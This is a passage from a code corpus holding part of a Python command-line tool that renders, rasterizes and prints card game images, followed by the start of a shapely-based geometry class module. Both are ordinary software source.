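# -> Namespace(display=True, layouting='fan')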
So there's a simpler form.\n subgroup = group.add_mutually_exclusive_group()\n s = 'display output using eog or evince depending on rasterization'\n subgroup.add_argument('-d', '--display', '--view', default=False,\n action='store_true', help=s)\n s = 'call APP to display output'\n subgroup.add_argument('--viewer', dest='display', metavar='APP',\n nargs='?', const=True, help=s)\n\n s = 'include the title of the first depicted card in each filename'\n parser.add_argument('--card-in-filename', default=False,\n action='store_true', help=s)\n s = 'include the title of the first deck represented in each filename'\n parser.add_argument('--deck-in-filename', default=False,\n action='store_true', help=s)\n s = 'do not include the title of the game in each filename'\n parser.add_argument('--no-game-in-filename', dest='game_in_filename',\n default=True, action='store_false', help=s)\n s = 'an arbitrary suffix to each filename'\n parser.add_argument('--filename-suffix', default='', help=s)\n\n def _add_selection_opts(self, parser):\n '''Add deck/card filtering options to an argument parser.'''\n\n s = 'optional card selection arguments'\n selection = parser.add_argument_group(title=s)\n s = 'card selection blacklist entry'\n selection.add_argument('-b', '--blacklist', metavar='REGEX',\n default=[], action='append', help=s)\n s = 'card selection whitelist entry (applied before blacklist)'\n selection.add_argument('-w', '--whitelist', metavar='REGEX',\n default=[], action='append', help=s)\n s = 'maximum 1 copy of each card'\n selection.add_argument('-g', '--gallery', default=False,\n action='store_true', help=s)\n s = 'maximum 1 card per deck'\n selection.add_argument('--deck-sample', default=False,\n action='store_true', help=s)\n\n def _add_media_opts(self, parser):\n '''Add media options to an argument parser.'''\n\n product = parser.add_argument_group(title='optional media arguments')\n\n def nonnegative_int(value):\n '''Type-checking function for argparse.'''\n value = int(value)\n if value < 0:\n s = 'not a non-negative integer: {}'.format(value)\n raise argparse.ArgumentTypeError(s)\n return value\n\n group = product.add_mutually_exclusive_group()\n s = 'produce a document from SVG data, format inferred from filename'\n group.add_argument('--document', metavar='FILENAME', help=s)\n\n # As with --display, we provide an option for default DPI that cannot\n # be confused with subsequent arguments.\n subgroup = group.add_mutually_exclusive_group()\n s = 'bitmap output via Inkscape at {} DPI'.format(self.default_dpi)\n subgroup.add_argument('-r', '--rasterize', action='store_const',\n const=self.default_dpi, help=s)\n s = 'bitmap output via Inkscape at any resolution'\n subgroup.add_argument('--dpi', metavar='DPI', nargs='?',\n dest='rasterize', const=self.default_dpi,\n type=nonnegative_int, help=s)\n\n def numeric_2tuple(value):\n '''Type-checking function for argparse.'''\n if not re.match('^\\(.*\\)$', value):\n value = '({})'.format(value)\n\n try:\n value = ast.literal_eval(value)\n assert isinstance(value, tuple)\n assert len(value) == 2\n assert all(map(lambda x: isinstance(x, (int, float)),\n value))\n assert all(map(lambda x: x >= 0, value))\n except:\n s = 'not a numeric 2-tuple like \"0,0\": {}'.format(value)\n raise argparse.ArgumentTypeError(s)\n\n return value\n\n s = 'paper size for printing, as a string instruction to lp'\n product.add_argument('--print-size', metavar='PAPER_FORMAT',\n default='A4', help=s)\n s = 'exact image size, in mm'\n product.add_argument('--image-size', 
metavar='TUPLE',\n type=numeric_2tuple,\n default=cbg.sample.size.A4, help=s)\n s = 'image margins to the outermost spaces for card(s), in mm'\n product.add_argument('--margins', metavar='TUPLE', type=numeric_2tuple,\n default=cbg.sample.size.A4_MARGINS, help=s)\n\n def _add_layouting_mode_opts(self, parser):\n '''Add layouting options to an argument parser.'''\n\n def arc(value):\n '''Type-checking function for argparse.'''\n try:\n value = float(value)\n except ValueError:\n raise argparse.ArgumentTypeError('must be a number')\n\n if not -math.pi <= value <= math.pi:\n s = 'cannot exceed π radians (180°)'\n raise argparse.ArgumentTypeError(s)\n\n return value\n\n parser.set_defaults(layouter_cls=cbg.layout.Layouter,\n side_in_filename=False, arc=0)\n s = 'optional non-standard layouting modes'\n subparsers = parser.add_subparsers(dest='layouting', title=s,\n help='each takes its own help flag')\n\n s = 'Alternate between front sheets and back sheets.'\n duplex = subparsers.add_parser('duplex', description=s)\n duplex.set_defaults(layouter_cls=cbg.layout.Duplex,\n side_in_filename=True)\n s = 'Do not include the word \"obverse\" or \"reverse\" in each filename.'\n duplex.add_argument('--no-side-in-filename', dest='side_in_filename',\n default=True, action='store_false', help=s)\n\n s = 'Treat both sides of cards similarly.'\n neighbours = subparsers.add_parser('neighbours', description=s)\n neighbours.set_defaults(layouter_cls=cbg.layout.Neighbours)\n\n s = 'Draw cards in the shape of a hand fan, for display purposes.'\n fan = subparsers.add_parser('fan', description=s)\n fan.set_defaults(layouter_cls=cbg.layout.Fan)\n s = ('the angle the cards will span; the last card will be on the '\n 'right with a positive angle, else on the left')\n fan.add_argument('--arc', metavar='RADIANS', type=arc,\n default=0, help=s)\n\n s = 'Give each card its own image.'\n singles = subparsers.add_parser('singles', description=s)\n singles.set_defaults(layouter_cls=cbg.layout.Singles,\n card_in_filename=True)\n\n return parser\n\n def check_cli(self, parser):\n '''CLI argument parsing, sanity checks and repackaging.'''\n\n args = parser.parse_args()\n\n if not any((args.include_obverse, args.include_reverse)):\n parser.error('asked to process neither side of cards')\n\n if args.layouting == 'duplex' or args.layouting == 'neighbours':\n args.include_reverse = True\n if not args.include_obverse:\n s = 'layouting mode requires both sides of each card'\n parser.error(s)\n\n if args.print:\n # Rasterization is implied.\n if not args.rasterize:\n args.rasterize = self.default_dpi\n\n return args\n\n def configure_logging(self):\n if self.args.verbose:\n level = logging.DEBUG\n elif self.args.quiet:\n level = logging.WARNING\n else:\n level = logging.INFO\n\n logging.getLogger().setLevel(level)\n\n def execute(self):\n # Clean up after previous runs.\n self.delete_old_files(self.folder_svg)\n self.delete_old_files(self.folder_png)\n\n # Collect and sieve through deck specifications.\n decks = self.read_deck_specs()\n\n # Consider console output before generating SVG.\n if self.args.list_cards:\n presentation = dict()\n for deck in decks:\n presentation[deck.title] = {str(t): c for t, c in deck.items()}\n\n print(cbg.serialization.Serialization.dumps(presentation))\n return 0\n\n # Produce SVG, treat it and exit application appropriately.\n try:\n return self._output(self.vectorize(decks))\n except self.ExternalError as e:\n logging.error(str(e))\n return 1\n\n def _output(self, images):\n '''Consider showing on screen, 
printing etc.\n\n Return an exit status: 0 if successful, else a positive integer.\n\n '''\n\n if self.args.rasterize:\n logging.debug('Producing raster graphics.')\n try:\n os.mkdir(self.folder_png)\n except FileExistsError:\n logging.debug('Destination folder for PNG already exists.')\n\n for image in images:\n image.filepath = self.rasterize(image.filepath)\n\n elif self.args.document:\n filepath = self.args.document\n if filepath.lower().endswith('.pdf'):\n self.convert_to_pdf(filepath)\n else:\n s = 'Unrecognized output filename suffix.'\n logging.error(s)\n return 1\n\n if self.args.display:\n if self.args.document:\n filename = self.args.document\n viewer = 'evince'\n elif self.args.rasterize:\n filename = self.folder_png\n viewer = 'eog'\n else:\n filename = self.folder_svg\n viewer = 'eog'\n\n if isinstance(self.args.display, str):\n viewer = self.args.display\n\n self._external_process([viewer, filename])\n\n elif self.args.list_images:\n presentation = dict()\n for image in images:\n presentation[image.filename] = tuple(map(str, image.subjects))\n print(cbg.serialization.Serialization.dumps(presentation))\n\n elif self.args.print:\n self.print_output()\n\n return 0\n\n def _external_process(self, cmd):\n def log_output(text):\n for line in text.splitlines():\n logging.debug('Subprocess output: {}'.format(line))\n\n try:\n o = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except FileNotFoundError:\n s = 'External application \"{}\" not found.'\n raise self.ExternalError(s.format(cmd[0]))\n except subprocess.CalledProcessError as e:\n logging.debug('Call {} failed.'.format(cmd))\n log_output(e.output)\n s = 'External application \"{}\" terminated with error: {}.'\n raise self.ExternalError(s.format(cmd[0], e.returncode))\n else:\n logging.debug('Call {} succeeded.'.format(cmd))\n log_output(o)\n return o\n\n def delete_old_files(self, folder):\n '''Use globbing to get a valid relative path.'''\n for f in glob.glob(folder + '/*'):\n try:\n os.remove(f)\n logging.debug('Deleted \"{}\".'.format(f))\n except IsADirectoryError:\n # Directories are permitted to remain, on the assumption\n # that they are being used to house xlink'd raster graphics.\n pass\n\n def read_deck_specs(self):\n logging.debug('Reading specifications.')\n\n for filename_base, card_cls in self.decks.items():\n deck = cbg.content.deck.Deck(card_cls, directory=self.folder_specs,\n filename_base=filename_base)\n deck.control_selection(self.args.whitelist, self.args.blacklist,\n self.args.gallery, self.args.deck_sample)\n yield deck\n\n def vectorize(self, decks):\n '''Compose SVG images and save them.\n\n Take a generator or other iterable of deck objects.\n\n Return a layouter, which is a list of the images with some extra\n information attached.\n\n '''\n\n logging.debug('Producing vector graphics.')\n\n # Flatten specifications to a single list of cards for layouting.\n cards = sorted(card for deck in decks for card in deck.flat())\n\n try:\n os.mkdir(self.folder_svg)\n except FileExistsError:\n logging.debug('Destination folder for SVG already exists.')\n\n layouter = self.args.layouter_cls(cards,\n image_size=self.args.image_size,\n image_margins=self.args.margins,\n arc=self.args.arc)\n layouter.run(self.args.include_obverse, self.args.include_reverse)\n\n title_filename = self.name_short if self.args.game_in_filename else ''\n layouter.save(self.folder_svg,\n side=self.args.side_in_filename,\n card=self.args.card_in_filename,\n deck=self.args.deck_in_filename,\n game=title_filename,\n 
suffix=self.args.filename_suffix)\n\n return layouter\n\n def rasterize(self, svg_filepath):\n '''Go from vector graphics to a bitmap using Inkscape.'''\n dpi = self.args.rasterize or self.default_dpi\n logging.debug('Rasterizing {}.'.format(svg_filepath))\n basename = os.path.basename(svg_filepath).rpartition('.')[0]\n png_filename = '{}.png'.format(basename)\n png_filepath = os.path.join(self.folder_png, png_filename)\n cmd = ['inkscape', '-e', png_filepath, '-d', str(dpi), svg_filepath]\n self._external_process(cmd)\n return png_filepath\n\n def convert_to_pdf(self, filepath):\n '''Author a PDF with librsvg.'''\n\n logging.debug('Authoring PDF.')\n\n command = ['rsvg-convert', '-f', 'pdf', '-o', filepath]\n command.extend(self.all_svg_filepaths())\n self._external_process(command)\n\n def all_svg_filepaths(self):\n return sorted(glob.glob('{}/*.svg'.format(self.folder_svg)))\n\n def print_output(self):\n '''Print graphics from individual image files: one per page.\n\n lp prints SVG as text, not graphics. Hence we use the rasterized\n forms here.\n\n '''\n\n logging.debug('Printing.')\n\n for png in sorted(glob.glob('{}/*'.format(self.folder_png))):\n cmd = (['lp', '-o', 'media={}'.format(self.args.print_size), png])\n self._external_process(cmd)\n\n # Not sure the above operation gets the scale exactly right!\n # lp seems to like printing PNGs to fill the page.\n\n # Pre-2014, the following had to be done after Inkscape to get\n # the right scale. ImageMagick for PNG to PostScript:\n # $ convert -page A4 <png> -resize 100 <ps>\n # Not sure if \"page\" flag is appropriate at this stage but it\n # may make margins in the SVG unnecessary.\n\n # 2014: Unfortunately PostScript stopped working at some point.\n # evince says \"assertion 'EV_IS_DOCUMENT (document)' failed\"\n # when opening the PostScript file, which lp prints at\n # drastically reduced size.\n\n # Printing PNG in GIMP respects scale, (with and?) without the\n # margins. Perhaps this can be scripted. Apparently,\n # rasterization in GIMP can be scripted.\n # http://porpoisehead.net/mysw/index.php?pgid=gimp_svg\n","repo_name":"veikman/cbg","sub_path":"cbg/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43103315506","text":"\"\"\"Base geometry class and utilities\n\nNote: a third, z, coordinate value may be used when constructing\ngeometry objects, but has no effect on geometric analysis. All\noperations are performed in the x-y plane. 
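A short standalone illustration of that note, using plain shapely (which these classes wrap); every predicate works on x and y only:

from shapely.geometry import Point

a = Point(0, 0, 1)  # z = 1
b = Point(0, 0, 2)  # z = 2

print(a.has_z, b.has_z)  # True True -- z is stored...
print(a.equals(b))       # True     -- ...but ignored by predicates
print(a.intersects(b))   # True
print(a.distance(b))     # 0.0      -- planar distance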
Thus, geometries with\ndifferent z values may intersect or be equal.\n\"\"\"\nfrom __future__ import annotations\n\nimport importlib\nimport random\n\nfrom binascii import a2b_hex\nfrom ctypes import pointer, c_size_t, c_char_p, c_void_p\nimport sys\nfrom warnings import warn\nfrom functools import wraps\n\nfrom typing import Iterable, Iterator\n\nfrom epl.protobuf.v1.geometry_pb2 import ProjectionData\nfrom shapely.coords import CoordinateSequence\nfrom shapely.geos import WKBWriter, WKTWriter\nfrom shapely.geos import lgeos\nfrom shapely.impl import DefaultImplementation, delegated\nfrom epl.protobuf.v1 import geometry_pb2\nfrom epl import geometry as geometry_init\nfrom shapely.wkb import loads as shapely_loads_wkb\n\ninteger_types = (int,)\n\ntry:\n import numpy as np\n\n integer_types = integer_types + (np.integer,)\nexcept ImportError:\n pass\n\nGEOMETRY_TYPES = [\n 'Point',\n 'LineString',\n 'LinearRing',\n 'Polygon',\n 'MultiPoint',\n 'MultiLineString',\n 'MultiPolygon',\n 'GeometryCollection',\n]\n\nGEOMETRY_MODULES = {\n 'Point': 'epl.geometry.point',\n 'LineString': 'epl.geometry.linestring',\n 'LinearRing': 'epl.geometry.polygon',\n 'Polygon': 'epl.geometry.polygon',\n 'MultiPoint': 'epl.geometry.multipoint',\n 'MultiLineString': 'epl.geometry.multilinestring',\n 'MultiPolygon': 'epl.geometry.multipolygon',\n 'GeometryCollection': 'epl.geometry.collection'\n}\n\nRESULT_ENCODING = geometry_pb2.EWKB\n\ndef dump_coords(geom):\n \"\"\"Dump coordinates of a geometry in the same order as data packing\"\"\"\n if not isinstance(geom, BaseGeometry):\n raise ValueError('Must be instance of a geometry class; found ' +\n geom.__class__.__name__)\n elif geom.type in ('Point', 'LineString', 'LinearRing'):\n return geom.coords[:]\n elif geom.type == 'Polygon':\n return geom.exterior.coords[:] + [i.coords[:] for i in geom.interiors]\n elif geom.type.startswith('Multi') or geom.type == 'GeometryCollection':\n # Recursive call\n return [dump_coords(part) for part in geom]\n else:\n raise ValueError('Unhandled geometry type: ' + repr(geom.type))\n\n\ndef geometry_type_name(g):\n if g is None:\n raise ValueError(\"Null geometry has no type\")\n return GEOMETRY_TYPES[lgeos.GEOSGeomTypeId(g)]\n\n\ndef geom_factory(g,\n parent=None,\n proj: geometry_pb2.ProjectionData = None):\n # Abstract geometry factory for use with topological methods below\n if not g:\n raise ValueError(\"No Shapely geometry can be created from null value\")\n ob = BaseGeometry(proj=proj)\n geom_type = geometry_type_name(g)\n # TODO: check cost of dynamic import by profiling\n\n mod = importlib.import_module(name=GEOMETRY_MODULES[geom_type])\n ob.__class__ = getattr(mod, geom_type)\n ob._geom = g\n ob.__p__ = parent\n if lgeos.methods['has_z'](g):\n ob._ndim = 3\n else:\n ob._ndim = 2\n ob._is_empty = False\n return ob\n\n\n# def geom_from_wkt(data, proj: geometry_pb2.ProjectionData):\n# warnings.warn(\"`geom_from_wkt` is deprecated. Use `geos.wkt_reader.read(data)`.\", DeprecationWarning)\n# if sys.version_info[0] >= 3:\n# data = data.encode('ascii')\n# geom = lgeos.GEOSGeomFromWKT(c_char_p(data))\n# if not geom:\n# raise ValueError(\n# \"Could not create geometry because of errors while reading input.\")\n# return geom_factory(geom, proj=proj)\n\n\ndef geom_to_wkt(ob):\n warn(\"`geom_to_wkt` is deprecated. 
Use `geos.wkt_writer.write(ob)`.\", DeprecationWarning)\n if ob is None or ob._geom is None:\n raise ValueError(\"Null geometry supports no operations\")\n return lgeos.GEOSGeomToWKT(ob._geom)\n\n\ndef deserialize_wkb(data):\n geom = lgeos.GEOSGeomFromWKB_buf(c_char_p(data), c_size_t(len(data)))\n if not geom:\n raise ValueError(\n \"Could not create geometry because of errors while reading input.\")\n return geom\n\n\n# def geom_from_wkb(data):\n# warn(\"`geom_from_wkb` is deprecated. Use `geos.wkb_reader.read(data)`.\",\n# DeprecationWarning)\n# return geom_factory(deserialize_wkb(data))\n\n\ndef geom_to_wkb(ob):\n warn(\"`geom_to_wkb` is deprecated. Use `geos.wkb_writer.write(ob)`.\",\n DeprecationWarning)\n if ob is None or ob._geom is None:\n raise ValueError(\"Null geometry supports no operations\")\n size = c_size_t()\n return lgeos.GEOSGeomToWKB_buf(c_void_p(ob._geom), pointer(size))\n\n\ndef geos_geom_from_py(ob, create_func=None):\n \"\"\"Helper function for geos_*_from_py functions in each geom type.\n If a create_func is specified the coodinate sequence is cloned and a new\n geometry is created with it, otherwise the geometry is cloned directly.\n This behaviour is useful for converting between LineString and LinearRing\n objects.\n \"\"\"\n if create_func is None:\n geom = lgeos.GEOSGeom_clone(ob._geom)\n else:\n cs = lgeos.GEOSGeom_getCoordSeq(ob._geom)\n cs = lgeos.GEOSCoordSeq_clone(cs)\n geom = create_func(cs)\n\n N = ob._ndim\n\n return geom, N\n\n\ndef exceptNull(func):\n \"\"\"Decorator which helps avoid GEOS operations on null pointers.\"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if not args[0]._geom or args[0].is_empty:\n raise ValueError(\"Null/empty geometry supports no operations\")\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass CAP_STYLE(object):\n round = 1\n flat = 2\n square = 3\n\n\nclass JOIN_STYLE(object):\n round = 1\n mitre = 2\n bevel = 3\n\n\nEMPTY = deserialize_wkb(a2b_hex(b'010700000000000000'))\n\n\nclass BaseGeometry(object):\n \"\"\"\n Provides GEOS spatial predicates and topological operations.\n\n \"\"\"\n\n # Attributes\n # ----------\n # __geom__ : c_void_p\n # Cached ctypes pointer to GEOS geometry. Not to be accessed.\n # _geom : c_void_p\n # Property by which the GEOS geometry is accessed.\n # __p__ : object\n # Parent (Shapely) geometry\n # _ctypes_data : object\n # Cached ctypes data buffer\n # _ndim : int\n # Number of dimensions (2 or 3, generally)\n # _crs : object\n # Coordinate reference system. Available for Shapely extensions, but\n # not implemented here.\n # _other_owned : bool\n # True if this object's GEOS geometry is owned by another as in the\n # case of a multipart geometry member.\n __geom__ = EMPTY\n __p__ = None\n _ctypes_data = None\n _ndim = None\n _crs = None\n _other_owned = False\n _is_empty = True\n\n # Backend config\n impl = DefaultImplementation\n\n # a reference to the so/dll proxy to preserve access during clean up\n _lgeos = lgeos\n\n def __init__(self,\n proj: geometry_pb2.ProjectionData,\n epsg: int = 0,\n proj4: str = \"\"):\n self._proj = get_proj(proj=proj, epsg=epsg, proj4=proj4)\n\n def empty(self, val=EMPTY):\n # TODO: defer cleanup to the implementation. 
We shouldn't be\n # explicitly calling a lgeos method here.\n if not self._is_empty and not self._other_owned and self.__geom__:\n try:\n self._lgeos.GEOSGeom_destroy(self.__geom__)\n except (AttributeError, TypeError):\n pass # _lgeos might be empty on shutdown\n self._is_empty = True\n self.__geom__ = val\n\n def __del__(self):\n self.empty(val=None)\n self.__p__ = None\n self._proj = None\n\n def __str__(self):\n return \"{0} {1}\".format(self.wkt, str(self.proj))\n\n # To support pickling\n def __reduce__(self):\n return self.__class__, (), self.wkb\n\n # TODO, does this get called anywhere?\n def __setstate__(self, state):\n self.empty()\n self.__geom__ = deserialize_wkb(state)\n self._is_empty = False\n if lgeos.methods['has_z'](self.__geom__):\n self._ndim = 3\n else:\n self._ndim = 2\n\n @property\n def _geom(self):\n return self.__geom__\n\n @_geom.setter\n def _geom(self, val):\n self.empty()\n self._is_empty = val in [EMPTY, None]\n self.__geom__ = val\n\n # Operators\n # ---------\n\n def __and__(self, other):\n return self.intersection(other)\n\n def __or__(self, other):\n return self.union(other)\n\n def __sub__(self, other):\n return self.difference(other)\n\n def __xor__(self, other):\n return self.symmetric_difference(other)\n\n def __eq__(self, other):\n return (\n type(other) == type(self) and\n tuple(self.coords) == tuple(other.coords) and\n self.proj_eq(other.proj)\n )\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n __hash__ = None\n\n def proj_eq(self, other_proj: geometry_pb2.ProjectionData):\n return proj_eq(self.proj, other_proj)\n\n # Array and ctypes interfaces\n # ---------------------------\n\n @property\n def ctypes(self):\n \"\"\"Return ctypes buffer\"\"\"\n raise NotImplementedError\n\n @property\n def array_interface_base(self):\n if sys.byteorder == 'little':\n typestr = '<f8'\n elif sys.byteorder == 'big':\n typestr = '>f8'\n else:\n raise ValueError(\n \"Unsupported byteorder: neither little nor big-endian\")\n return {\n 'version': 3,\n 'typestr': typestr,\n 'data': self.ctypes,\n }\n\n @property\n def __array_interface__(self):\n \"\"\"Provide the Numpy array protocol.\"\"\"\n raise NotImplementedError\n\n # Coordinate access\n # -----------------\n\n def _get_coords(self):\n \"\"\"Access to geometry's coordinates (CoordinateSequence)\"\"\"\n if self.is_empty:\n return []\n return CoordinateSequence(self)\n\n def _set_coords(self, ob):\n raise NotImplementedError(\n \"set_coords must be provided by derived classes\")\n\n coords = property(_get_coords, _set_coords)\n\n @property\n def xy(self):\n \"\"\"Separate arrays of X and Y coordinate values\"\"\"\n raise NotImplementedError\n\n # Python feature protocol\n\n @property\n def __geo_interface__(self):\n \"\"\"Dictionary representation of the geometry\"\"\"\n raise NotImplementedError\n\n # Type of geometry and its representations\n # ----------------------------------------\n\n def geometryType(self):\n return geometry_type_name(self._geom)\n\n @property\n def type(self):\n return self.geometryType()\n\n def to_wkb(self):\n warn(\"`to_wkb` is deprecated. Use the `wkb` property.\",\n DeprecationWarning)\n return geom_to_wkb(self)\n\n def to_wkt(self):\n warn(\"`to_wkt` is deprecated. 
Use the `wkt` property.\",\n DeprecationWarning)\n return geom_to_wkt(self)\n\n @property\n def wkt(self):\n \"\"\"WKT representation of the geometry\"\"\"\n return WKTWriter(lgeos).write(self)\n\n @property\n def wkb(self):\n \"\"\"WKB representation of the geometry\"\"\"\n return WKBWriter(lgeos).write(self)\n\n @property\n def wkb_hex(self):\n \"\"\"WKB hex representation of the geometry\"\"\"\n return WKBWriter(lgeos).write_hex(self)\n\n def svg(self, scale_factor=1., **kwargs):\n \"\"\"Raises NotImplementedError\"\"\"\n raise NotImplementedError\n\n def _repr_svg_(self):\n \"\"\"SVG representation for iPython notebook\"\"\"\n svg_top = '<svg xmlns=\"http://www.w3.org/2000/svg\" ' \\\n 'xmlns:xlink=\"http://www.w3.org/1999/xlink\" '\n if self.is_empty:\n return svg_top + '/>'\n else:\n # Establish SVG canvas that will fit all the data + small space\n xmin, ymin, xmax, ymax = self.bounds\n if xmin == xmax and ymin == ymax:\n # This is a point; buffer using an arbitrary size\n xmin, ymin, xmax, ymax = self.s_buffer(1).bounds\n else:\n # Expand bounds by a fraction of the data ranges\n expand = 0.04 # or 4%, same as R plots\n widest_part = max([xmax - xmin, ymax - ymin])\n expand_amount = widest_part * expand\n xmin -= expand_amount\n ymin -= expand_amount\n xmax += expand_amount\n ymax += expand_amount\n dx = xmax - xmin\n dy = ymax - ymin\n width = min([max([100., dx]), 300])\n height = min([max([100., dy]), 300])\n try:\n scale_factor = max([dx, dy]) / max([width, height])\n except ZeroDivisionError:\n scale_factor = 1.\n view_box = \"{} {} {} {}\".format(xmin, ymin, dx, dy)\n transform = \"matrix(1,0,0,-1,0,{})\".format(ymax + ymin)\n return svg_top + (\n 'width=\"{1}\" height=\"{2}\" viewBox=\"{0}\" '\n 'preserveAspectRatio=\"xMinYMin meet\">'\n '<g transform=\"{3}\">{4}</g></svg>'\n ).format(view_box, width, height, transform,\n self.svg(scale_factor))\n\n @property\n def geom_type(self):\n \"\"\"Name of the geometry's type, such as 'Point'\"\"\"\n return self.geometryType()\n\n # Real-valued properties and methods\n # ----------------------------------\n\n @property\n def s_area(self):\n \"\"\"Unitless area of the geometry (float)\"\"\"\n return self.impl['area'](self)\n\n def s_distance(self, other):\n \"\"\"Unitless distance to other geometry (float)\"\"\"\n return self.impl['distance'](self, other)\n\n def s_hausdorff_distance(self, other):\n \"\"\"Unitless hausdorff distance to other geometry (float)\"\"\"\n return self.impl['hausdorff_distance'](self, other)\n\n @property\n def s_length(self):\n \"\"\"Unitless length of the geometry (float)\"\"\"\n return self.impl['length'](self)\n\n # Topological properties\n # ----------------------\n\n @property\n def boundary(self):\n \"\"\"\n Returns a lower dimension geometry that bounds the object\n\n The boundary of a polygon is a line, the boundary of a line is a\n collection of points. 
The boundary of a point is an empty (null)\n collection.\n \"\"\"\n return geom_factory(self.impl['boundary'](self), proj=self.proj)\n\n @property\n def bounds(self):\n \"\"\"Returns minimum bounding region (minx, miny, maxx, maxy)\"\"\"\n if self.is_empty:\n return ()\n else:\n return self.impl['bounds'](self)\n\n @property\n def centroid(self):\n \"\"\"Returns the geometric center of the object\"\"\"\n return geom_factory(self.impl['centroid'](self), proj=self.proj)\n\n @delegated\n def representative_point(self):\n \"\"\"Returns a point guaranteed to be within the object, cheaply.\"\"\"\n return geom_factory(self.impl['representative_point'](self), proj=self.proj)\n\n @property\n def s_convex_hull(self):\n \"\"\"Imagine an elastic band stretched around the geometry: that's a\n convex hull, more or less\n\n The convex hull of a three member multipoint, for example, is a\n triangular polygon.\n \"\"\"\n return geom_factory(self.impl['convex_hull'](self), proj=self.proj)\n\n @property\n def envelope(self):\n \"\"\"A figure that envelopes the geometry\"\"\"\n return geom_factory(self.impl['envelope'](self), proj=self.proj)\n\n def s_buffer(self, distance, resolution=16, quadsegs=None,\n cap_style=CAP_STYLE.round, join_style=JOIN_STYLE.round,\n mitre_limit=5.0):\n \"\"\"Returns a geometry with an envelope at a distance from the object's\n envelope\n\n A negative distance has a \"shrink\" effect. A zero distance may be used\n to \"tidy\" a polygon. The resolution of the buffer around each vertex of\n the object increases by increasing the resolution keyword parameter\n or second positional parameter. Note: the use of a `quadsegs` parameter\n is deprecated and will be gone from the next major release.\n\n The styles of caps are: CAP_STYLE.round (1), CAP_STYLE.flat (2), and\n CAP_STYLE.square (3).\n\n The styles of joins between offset segments are: JOIN_STYLE.round (1),\n JOIN_STYLE.mitre (2), and JOIN_STYLE.bevel (3).\n\n The mitre limit ratio is used for very sharp corners. The mitre ratio\n is the ratio of the distance from the corner to the end of the mitred\n offset corner. When two line segments meet at a sharp angle, a miter\n join will extend the original geometry. To prevent unreasonable\n geometry, the mitre limit allows controlling the maximum length of the\n join corner. Corners with a ratio which exceed the limit will be\n beveled.\n\n Example:\n\n >>> from shapely.wkt import loads\n >>> g = loads('POINT (0.0 0.0)')\n >>> g.buffer(1.0).area # 16-gon approx of a unit radius circle\n 3.1365484905459389\n >>> g.buffer(1.0, 128).area # 128-gon approximation\n 3.1415138011443009\n >>> g.buffer(1.0, 3).area # triangle approximation\n 3.0\n >>> list(g.buffer(1.0, cap_style='square').exterior.coords)\n [(1.0, 1.0), (1.0, -1.0), (-1.0, -1.0), (-1.0, 1.0), (1.0, 1.0)]\n >>> g.buffer(1.0, cap_style='square').area\n 4.0\n \"\"\"\n if quadsegs is not None:\n warn(\n \"The `quadsegs` argument is deprecated. 
Use `resolution`.\", DeprecationWarning, stacklevel=2)\n res = quadsegs\n else:\n res = resolution\n if mitre_limit == 0.0:\n raise ValueError(\n 'Cannot compute offset from zero-length line segment')\n if cap_style == CAP_STYLE.round and join_style == JOIN_STYLE.round:\n return geom_factory(self.impl['buffer'](self, distance, res), proj=self.proj)\n\n if 'buffer_with_style' not in self.impl:\n raise NotImplementedError(\"Styled buffering not available for \"\n \"GEOS versions < 3.2.\")\n\n return geom_factory(self.impl['buffer_with_style'](self, distance, res,\n cap_style,\n join_style,\n mitre_limit), proj=self.proj)\n\n @delegated\n def s_simplify(self, tolerance, preserve_topology=True):\n \"\"\"Returns a simplified geometry produced by the Douglas-Peucker\n algorithm\n\n Coordinates of the simplified geometry will be no more than the\n tolerance distance from the original. Unless the topology preserving\n option is used, the algorithm may produce self-intersecting or\n otherwise invalid geometries.\n \"\"\"\n if preserve_topology:\n op = self.impl['topology_preserve_simplify']\n else:\n op = self.impl['simplify']\n return geom_factory(op(self, tolerance), proj=self.proj)\n\n # Binary operations\n # -----------------\n\n def s_difference(self, other):\n \"\"\"Returns the difference of the geometries\"\"\"\n return geom_factory(self.impl['difference'](self, other), proj=self.proj)\n\n def s_intersection(self, other):\n \"\"\"Returns the intersection of the geometries\"\"\"\n return geom_factory(self.impl['intersection'](self, other), proj=self.proj)\n\n def s_symmetric_difference(self, other):\n \"\"\"Returns the symmetric difference of the geometries\n (Shapely geometry)\"\"\"\n return geom_factory(self.impl['symmetric_difference'](self, other), proj=self.proj)\n\n def s_union(self, other):\n \"\"\"Returns the union of the geometries (Shapely geometry)\"\"\"\n return geom_factory(self.impl['union'](self, other), proj=self.proj)\n\n # Unary predicates\n # ----------------\n\n @property\n def has_z(self):\n \"\"\"True if the geometry's coordinate sequence(s) have z values (are\n 3-dimensional)\"\"\"\n return bool(self.impl['has_z'](self))\n\n @property\n def is_empty(self):\n \"\"\"True if the set of points in this geometry is empty, else False\"\"\"\n return (self._geom is None) or bool(self.impl['is_empty'](self))\n\n @property\n def is_ring(self):\n \"\"\"True if the geometry is a closed ring, else False\"\"\"\n return bool(self.impl['is_ring'](self))\n\n @property\n def is_closed(self):\n \"\"\"True if the geometry is closed, else False\n\n Applicable only to 1-D geometries.\"\"\"\n if self.geom_type == 'LinearRing':\n return True\n elif self.geom_type == 'LineString':\n if 'is_closed' in self.impl:\n return bool(self.impl['is_closed'](self))\n else:\n return self.coords[0] == self.coords[-1]\n else:\n return False\n\n @property\n def s_is_simple(self):\n \"\"\"True if the geometry is simple, meaning that any self-intersections\n are only at boundary points, else False\"\"\"\n return bool(self.impl['is_simple'](self))\n\n @property\n def s_is_valid(self):\n \"\"\"True if the geometry is valid (definition depends on sub-class),\n else False\"\"\"\n return bool(self.impl['is_valid'](self))\n\n # Binary predicates\n # -----------------\n\n def s_relate(self, other):\n \"\"\"Returns the DE-9IM intersection matrix for the two geometries\n (string)\"\"\"\n return self.impl['relate'](self, other)\n\n def s_covers(self, other):\n \"\"\"Returns True if the geometry covers the other, else 
